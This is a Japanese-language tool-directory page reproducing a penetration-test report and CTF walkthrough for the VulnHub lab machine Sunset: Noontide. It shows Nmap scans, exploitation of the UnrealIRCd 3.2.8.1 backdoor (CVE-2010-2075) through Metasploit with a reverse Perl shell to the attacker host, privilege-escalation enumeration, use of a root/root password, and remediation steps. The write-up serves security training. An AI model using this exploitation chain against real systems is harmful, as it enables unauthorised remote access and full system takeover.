Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
sunset-noontide-pentesting — 説明 Sunset: Noontide VulnHubマシンのプロフェッショナルなペネトレーションテスト評価。偵察、サービス列挙、CVE-2010-2075の悪用、ポストエクスプロイテーション、権限昇格、およびシステム全体の侵害を網羅しています。 | Kitploit
ツール/GitHubGitHub/zales2004/sunset-noontide-pentesting
特権昇格偵察ポートスキャン脆弱性分析エクスプロイトポストエクスプロイトネットワークセキュリティCTFペネトレーションテスト

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
学習と教育
レッドチーミング
ラボと実践
GitHubzales2004/sunset-noontide-pentesting

sunset-noontide-pentesting

説明 Sunset: Noontide VulnHubマシンのプロフェッショナルなペネトレーションテスト評価。偵察、サービス列挙、CVE-2010-2075の悪用、ポストエクスプロイテーション、権限昇格、およびシステム全体の侵害を網羅しています。

リポジトリを見る
9時間7分前未レビュー

Sunset: Noontide — ペネトレーションテスト

Sunset: Noontide のプロフェッショナルなペネトレーションテスト評価およびCTFウォークスルーです。これは VulnHub の意図的に脆弱なマシンです。

本プロジェクトは、偵察、サービス列挙、脆弱性調査、エクスプロイト、初期アクセス、ポストエクスプロイト、権限昇格、侵害の証明、リスク評価、MITRE ATT&CKマッピング、および修復を含む、完全なペネトレーションテストライフサイクルを文書化しています。

⚠️ 免責事項: 本評価は、認可されたラボ環境において、意図的に脆弱なマシンに対して実施されました。ここに記載されている技術およびコマンドは、明示的な認可が得られているシステムに対してのみ使用することを意図しています。


🎯 目的

  • ターゲットホストの特定
  • 公開されているサービスの列挙
  • 脆弱なソフトウェアとバージョンの特定
  • 該当する脆弱性の調査
  • 脆弱なサービスのエクスプロイト
  • 初期シェルアクセスの取得
  • Linuxポストエクスプロイト列挙の実施
  • 権限昇格の機会の特定
  • rootレベルのアクセス取得
  • ユーザーおよびrootのプルーフファイルの回収
  • セキュリティ上の発見事項の文書化
  • 修復に関する推奨事項の提供

🖥️ ラボ環境

コンポーネント詳細
ターゲットSunset: Noontide
プラットフォームVulnHub
ターゲットIP10.106.186.186
ターゲットホスト名noontide
ターゲットOSDebian GNU/Linux 10 (Buster)
アーキテクチャx86_64
攻撃者プラットフォームKali Linux
攻撃者IP10.106.186.204
評価タイプ認可されたラボ評価
総合リスクCRITICAL
評価結果Full System Compromise

🔐 攻撃チェーン

ターゲット探索 → Nmap列挙 → UnrealIRCd 3.2.8.1の特定 → SearchSploit → CVE-2010-2075の特定 → Metasploitエクスプロイト → リモートコマンドシェル → serverとしてのシェル → Linuxポストエクスプロイト → 脆弱なroot認証情報 → su root → UID 0 / rootアクセス → ユーザーおよびrootプルーフファイル


1. 偵察

脆弱なターゲットを特定するために、初期のネットワーク探索を実施しました。

最終的にターゲットは以下と特定されました:

10.106.186.186

偵察中に、10.106.186.142 は意図したターゲットではなくデフォルトゲートウェイであると特定されました。

これは、特にブリッジまたは共有ラボネットワークにおいて、さらなるセキュリティテストを実施する前にターゲットを正確に特定することの重要性を強調しています。


2. サービス列挙

以下を使用して、ターゲットに対してNmapのサービスおよびバージョン検出を実施しました:

nmap -sV 10.106.186.186

評価中に特定された重要な公開サービスは以下でした:

6667/tcp open irc UnrealIRCd

次に、以下を使用してより詳細なスキャンを実施しました:

nmap -sC -sV -Pn -p 6667 10.106.186.186

サービスは以下と特定されました:

UnrealIRCd 3.2.8.1

IRCサービスは以下も報告しました:

irc.foonet.com

公開されているUnrealIRCdサービスが、評価中に調査された主要な攻撃対象領域となりました。


3. 脆弱性調査

SearchSploitを使用して、発見されたUnrealIRCdバージョンに関連する公開文書化された脆弱性を調査しました。

コマンド:

searchsploit UnrealIRCd 3.2.8.1

関連する結果は以下でした:

UnrealIRCd 3.2.8.1 - Backdoor Command Exec

linux/remote/16922.rb

脆弱性は以下と特定されました:

CVE-2010-2075

脆弱性

UnrealIRCd 3.2.8.1 バックドアコマンド実行

深刻度

Critical

攻撃タイプ

リモートコマンド実行

セキュリティへの影響

脆弱なサービスのエクスプロイトに成功すると、攻撃者はターゲットシステム上でコマンドをリモート実行できるようになります。


4. Metasploitエクスプロイト

脆弱なIRCサービスは、Metasploit Frameworkを使用してエクスプロイトされました。

選択されたモジュールは以下でした:

exploit/unix/irc/unreal_ircd_3281_backdoor

設定例:

use exploit/unix/irc/unreal_ircd_3281_backdoor

set RHOST 10.106.186.186

初期のペイロード試行では、使用可能なセッションが得られませんでした。

その後、互換性のあるUnixリバースPerlペイロードが選択されました:

set payload cmd/unix/reverse_perl

set LHOST 10.106.186.204

set LPORT 4444

run

Metasploitは、ターゲットが脆弱であると思われると報告し、コマンドシェルセッションを正常に開きました。


5. 初期アクセス

取得したシェルは以下を使用して検証しました:

whoami

結果:

server

これにより、serverアカウントとしてのリモートコマンド実行の成功が確認されました。

初期の作業ディレクトリは以下でした:

/home/server/irc/Unreal3.2

この段階で、評価はリモートサービスエクスプロイトからローカルポストエクスプロイト列挙へと進みました。


6. ポストエクスプロイト列挙

シェルを取得した後、侵害されたホストを理解し、潜在的な権限昇格経路を特定するために、標準的なLinux列挙を実施しました。

現在のユーザー

コマンド:

id

結果:

uid=1000(server) gid=1000(server)

このアカウントは非rootユーザーでした。

ホスト名

コマンド:

hostname

結果:

noontide

カーネル情報

コマンド:

uname -a

結果:

Linux noontide 4.19.0-10-amd64 x86_64

オペレーティングシステム

コマンド:

cat /etc/os-release

結果:

Debian GNU/Linux 10 (buster)

これらのコマンドにより、現在のID、ホスト名、カーネルバージョン、オペレーティングシステム、および一般的なシステム構成が確認されました。


7. 権限昇格列挙

いくつかの標準的なLinux権限昇格チェックを実施しました。

7.1 SUID列挙

コマンド:

find / -perm -4000 -type f 2>/dev/null

passwd、chsh、mount、umount、su、chfn、newgrp、gpasswd などの標準的なSUIDバイナリが特定されました。

昇格経路として成功した、明らかなカスタムまたは異常なSUIDバイナリは特定されませんでした。


7.2 Sudo列挙

コマンド:

sudo -l

利用可能な出力から、有用なsudoベースの権限昇格経路は特定されませんでした。


7.3 Cron列挙

コマンド:

cat /etc/crontab

ls -la /etc/cron.d/

ls -la /etc/cron.hourly/

ls -la /etc/cron.daily/

ls -la /etc/cron.weekly/

観察されたスケジュールされたジョブは、標準的なDebian形式のシステムジョブでした。

明らかな書き込み可能なroot cronジョブは特定されませんでした。


7.4 書き込み可能ファイル列挙

コマンド:

find / -writable -type f 2>/dev/null | head -100

初期の結果は主に /proc の疑似ファイルであり、実用的な権限昇格経路は明らかになりませんでした。


7.5 Linuxケイパビリティ

コマンド:

getcap -r / 2>/dev/null

結果の出力から、有用なケイパビリティベースの権限昇格は特定されませんでした。


8. 権限昇格

成功した権限昇格経路は、脆弱なマシンに設定された意図的に脆弱なroot認証情報に基づいていました。

rootアカウントには以下を使用してアクセスしました:

su root

パスワード:

root

次に、以下を使用してrootアクセスを検証しました:

id

結果:

uid=0(root) gid=0(root) groups=0(root)

IDは以下を使用しても確認されました:

whoami

結果:

root

これにより、ターゲットシステムの完全な管理者制御が確認されました。


9. 侵害の証明

9.1 ユーザーレベルのプルーフ

ユーザーレベルのプルーフファイルは以下にありました:

/home/server/local.txt

コマンド:

cat /home/server/local.txt

結果:

c53c08b5bf2b0801c5d0c24149826a6e


9.2 rootレベルのプルーフ

rootレベルのプルーフファイルは以下にありました:

/root/proof.txt

コマンド:

cat /root/proof.txt

結果:

ab28c8ca8da1b9ffc2d702ac54221105

rootプルーフは以下も返しました:

Thanks for playing! - Felipe Winsnes (@whitecr0wz)

両方のプルーフファイルの回収により、初期リモートアクセスからrootレベルの制御に至るまでの侵害の成功が確認されました。


10. リスクサマリー

ID発見事項深刻度影響
VULN-01UnrealIRCd 3.2.8.1 バックドア🔴 Criticalリモートコマンド実行
VULN-02脆弱なroot認証情報🔴 Critical完全な管理者侵害

11. 詳細な発見事項

VULN-01 — UnrealIRCd 3.2.8.1 バックドア

深刻度: Critical

影響を受けるサービス: IRC / TCP 6667

影響を受けるソフトウェア: UnrealIRCd 3.2.8.1

CVE: CVE-2010-2075

攻撃タイプ: リモートコマンド実行

観察された影響: serverとしてリモートシェルを取得

説明

公開されているUnrealIRCdサービスは、既知のバックドアコマンド実行脆弱性に関連する脆弱なバージョンを実行していました。

この脆弱性は、サービス列挙とSearchSploit調査を通じて特定され、Metasploitを使用してエクスプロイトに成功しました。

ビジネスへの影響

脆弱なIRCサービスに到達できる攻撃者は、コマンドをリモート実行し、ホストへの不正アクセスを取得できる可能性があります。


VULN-02 — 脆弱なroot認証情報

深刻度: Critical

影響を受けるアカウント: root

観察された認証情報: root / root

観察された影響: UID 0の管理者アクセス

説明

rootアカウントは、極めて脆弱な認証情報で設定されていました。

serverとしてローカルシェルを取得した後、脆弱な認証情報を使用してrootアカウントにアクセスし、UID 0で検証しました。

ビジネスへの影響

ローカルシェルアクセスを取得した攻撃者は、脆弱なroot認証情報を使用してオペレーティングシステムの完全な制御を取得できます。


12. MITRE ATT&CKマッピング


13. 修復に関する推奨事項

13.1 UnrealIRCdの削除またはアップグレード

脆弱なUnrealIRCdインストールを、信頼できるサポート対象のリリースに置き換えてください。

展開前に、ソフトウェアの完全性とパッケージの出所を検証してください。

13.2 バックドアされたソフトウェアの削除

ソフトウェアの完全性または出所が不確かな場合は、信頼できるインストールメディアと検証済みパッケージを使用してシステムを再構築してください。

13.3 脆弱な認証情報の排除

デフォルトおよび脆弱な認証情報を、強力で一意の管理者認証情報に置き換えてください。

root のような単純なパスワードを使用しないでください。

13.4 IRC公開の制限

IRCが必要な場合は、以下を使用してアクセスを制限してください:

  • ファイアウォールルール
  • ネットワークセグメンテーション
  • VPNアクセス
  • 送信元IP制限

13.5 セキュリティ更新の適用

オペレーティングシステムおよびすべての公開サービスに対して、文書化されたパッチ管理プロセスを維持してください。

13.6 特権アクセスの監視

以下をログに記録し、レビューしてください:

  • 管理者認証
  • rootアクセス
  • 権限の変更
  • 疑わしい認証活動

14. ペネトレーションテスト手法


15. 使用ツール

  • Nmap — ネットワーク探索とサービス列挙
  • SearchSploit — 脆弱性およびエクスプロイト調査
  • Metasploit Framework — エクスプロイトとセッション確立
  • Linuxコマンドラインユーティリティ — ポストエクスプロイトと権限列挙

16. 実証されたスキル

  • ネットワーク偵察
  • ホスト探索
  • ポートスキャン
  • サービス列挙
  • バージョン特定
  • 脆弱性評価
  • CVE調査
  • SearchSploit
  • Metasploit Framework
  • リモートコマンド実行
  • Linux列挙
  • SUID列挙
  • Sudo列挙
  • Cron列挙
  • 書き込み可能ファイル列挙
  • Linuxケイパビリティ
  • 認証情報セキュリティ評価
  • 権限昇格
  • 侵害の証明
  • MITRE ATT&CKマッピング
  • リスク評価
  • セキュリティ報告
  • 修復分析

17. 最終評価

Sunset: Noontide ホストは、初期ネットワークアクセスから完全なrootレベルの制御に至るまで、正常に侵害されました。

主要な初期アクセス脆弱性は、UnrealIRCd 3.2.8.1 バックドア (CVE-2010-2075) でした。

この脆弱性はリモートコマンド実行を可能にし、serverアカウントとしての初期シェルをもたらしました。

その後、SUID、sudo、cron、書き込み可能ファイル、Linuxケイパビリティ、ID、オペレーティングシステム、ファイルシステムのチェックを含むポストエクスプロイト列挙を実施しました。

これらのチェックでは、成功した昇格経路は特定されませんでした。

完全な管理者アクセスは、最終的にマシンの脆弱なroot認証情報を通じて達成されました。

ユーザーレベルとrootレベルの両方のプルーフファイルの回収に成功したことで、完全なシステム侵害が確認されました。

総合評価

CRITICAL — 完全なシステム侵害を達成


18. 評価結果


19. プロフェッショナルペネトレーションテストレポート

詳細なプロフェッショナルペネトレーションテストレポートが本プロジェクトに含まれています:

Sunset-Noontide-Penetration-Testing-Report.pdf

レポートには以下が含まれます:

  • エグゼクティブサマリー
  • 文書管理
  • スコープとエンゲージメントルール
  • リスクサマリー
  • 攻撃パス
  • 偵察
  • サービス列挙
  • 脆弱性調査
  • Metasploitエクスプロイト
  • 初期アクセス
  • ポストエクスプロイト
  • 権限昇格
  • 証拠とプルーフファイル
  • 詳細な発見事項
  • MITRE ATT&CKマッピング
  • 修復に関する推奨事項
  • 最終評価

20. 証拠

推奨されるリポジトリ構造:

sunset-noontide-pentesting/

├── README.md

├── Sunset-Noontide-Penetration-Testing-Report.pdf

└── evidence/

├── 01-target-discovery.png

├── 02-nmap-enumeration.png

├── 03-searchsploit.png

├── 04-metasploit-exploitation.png

├── 05-initial-shell.png

├── 06-post-exploitation.png

├── 07-privilege-escalation.png

└── 08-root-proof.png

スクリーンショットには、認可されたラボ環境からの情報のみを含める必要があります。


21. 学んだ教訓

本評価は、以下に関する実践的な経験を提供しました:

  1. ネットワーク環境において意図したターゲットを正確に特定すること。
  2. Nmapを使用してサービスおよびバージョン列挙を実施すること。
  3. SearchSploitを使用して脆弱性を調査すること。
  4. 適切なMetasploitエクスプロイトモジュールを選択すること。
  5. ペイロードの互換性をトラブルシューティングすること。
  6. リモートコマンドシェルを確立すること。
  7. Linuxポストエクスプロイト列挙を実施すること。
  8. 一般的な権限昇格経路を体系的にチェックすること。
  9. 脆弱な管理者認証情報を特定すること。
  10. rootレベルの侵害を検証すること。
  11. 侵害の証明の証拠を収集すること。
  12. プロフェッショナルなペネトレーションテスト形式で脆弱性を文書化すること。

22. ⚠️ 法的および倫理的な免責事項

本リポジトリは、厳密に以下の目的で提供されています:

  • サイバーセキュリティ教育
  • 認可されたペネトレーションテスト
  • CTF練習
  • 脆弱性調査
  • ラボ環境

本リポジトリに記載されている技術は、明示的な認可が得られているシステムに対してのみ実行する必要があります。

許可なく、本番システム、公共インフラ、または第三者のシステムに対してこれらの技術を使用しないでください。


👨‍💻 著者

Alen Sales K S

Cybersecurity | Penetration Testing | SOC | Network Security

GitHub: https://github.com/zales2004


⭐ プロジェクトサマリー

Sunset: Noontide は、完全なペネトレーションテストワークフローを実証しています:

偵察 → 列挙 → 脆弱性調査 → エクスプロイト → 初期アクセス → ポストエクスプロイト → 権限昇格 → rootアクセス → 証拠収集 → リスク評価 → セキュリティ報告

評価結果: CRITICAL — 完全なシステム侵害を達成

ツールをダウンロード
テクニックID観察された活動
Network Service ScanningT1046Nmap列挙
Exploit Public-Facing ApplicationT1190公開されたUnrealIRCdサービスのエクスプロイト
Command and Scripting InterpreterT1059リモートコマンドシェル
Valid AccountsT1078root認証情報の使用
Account DiscoveryT1087IDおよびユーザー列挙
System Information DiscoveryT1082uname および /etc/os-release
File and Directory DiscoveryT1083ファイルシステム列挙
Scheduled Task/Job DiscoveryT1053Cron列挙
Permission Groups DiscoveryT1069id およびグループ列挙
フェーズ活動
偵察ネットワーク探索とターゲット特定
列挙Nmapサービス/バージョン検出
脆弱性調査SearchSploitおよびMetasploitモジュールの特定
エクスプロイトUnrealIRCdバックドアのエクスプロイト
初期アクセスserverとしてのコマンドシェル
ポストエクスプロイトID、OS、ファイルシステム、権限の列挙
権限昇格SUID、sudo、cron、書き込み可能ファイル、ケイパビリティのチェック
証拠収集ユーザーおよびrootプルーフファイル
報告発見事項、リスク分析、修復
目的ステータス
ターゲット特定✅ PASS
公開サービスの特定✅ PASS
脆弱なバージョンの特定✅ PASS
CVEの特定✅ PASS
リモートコマンド実行✅ PASS
serverとしての初期シェル✅ PASS
ユーザープルーフの回収✅ PASS
権限昇格✅ PASS
rootアクセスの検証✅ PASS
rootプルーフの回収✅ PASS